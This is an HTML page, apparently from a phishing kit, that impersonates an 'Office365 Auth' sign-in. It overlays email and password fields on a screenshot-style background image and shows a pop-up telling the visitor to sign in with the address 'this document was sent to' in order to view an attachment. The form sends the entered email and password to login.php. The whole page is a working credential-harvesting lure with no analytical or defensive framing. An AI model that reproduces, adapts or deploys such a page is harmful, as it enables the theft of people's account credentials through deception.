<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Office365 Auth</title>

<meta name="generator" content="Web Page Maker">
 <script type="text/javascript" src="https://code.jquery.com/jquery-1.8.2.js"></script>
<style type="text/css">
#overlay {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: #000;
filter:alpha(opacity=70);
-moz-opacity:0.7;
-khtml-opacity: 0.7;
opacity: 0.7;
z-index: 100;
display: none;
}
.cnt223 a{
text-decoration: none;
}
.popup{
width: 100%;
margin: 0 auto;
display: none;
position: fixed;
z-index: 101;
}
.cnt223{
min-width: 600px;
width: 600px;
min-height: 150px;
margin: 100px auto;
background: #f3f3f3;
position: relative;
z-index: 103;
padding: 15px 35px;
border-radius: 5px;
box-shadow: 0 2px 5px #000;
}
.cnt223 p{
clear: both;
    color: #555555;
    /* text-align: justify; */
    font-size: 15px;
    font-family: sans-serif;
}
.cnt223 p a{
color: #d91900;
font-weight: medium;
}
.cnt223 .x{
float: right;
height: 35px;
left: 22px;
position: relative;
top: -25px;
width: 34px;
}
.cnt223 .x:hover{
cursor: pointer;
}
</style>
<script type='text/javascript'>
$(function(){
var overlay = $('<div id="overlay"></div>');
overlay.show();
overlay.appendTo(document.body);
$('.popup').show();
$('.close').click(function(){
$('.popup').hide();
overlay.appendTo(document.body).remove();
return false;
});


 

$('.x').click(function(){
$('.popup').hide();
overlay.appendTo(document.body).remove();
return false;
});
});
</script>
<div class='popup'>
<div class='cnt223'>
<h3>Help</h3>
<p>
To view the attached document please sign in with the email address this document was sent to.
<br/>
<br/>
<a href='' class='close'>Close</a>
</p>
</div>
</div>
</head>
<body>

<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:652px; z-index:0"><img src="./images/paste765.jpg" alt="" title="" border=0 width=1365 height=652></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="email" style="position:absolute;width:352px;left:646px;top:278px;z-index:2;height: 43px;" required placeholder="Example@email.com">
<input name="formtext2" type="password" style="position:absolute;width:352px;left:646px;top:325px;z-index:3;height: 43px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:642px; top:383px; z-index:4"><input type="image" name="formimage1" width="360" height="47" src="./images/lo1.jpg"></div>
</form>


</body>
</html>
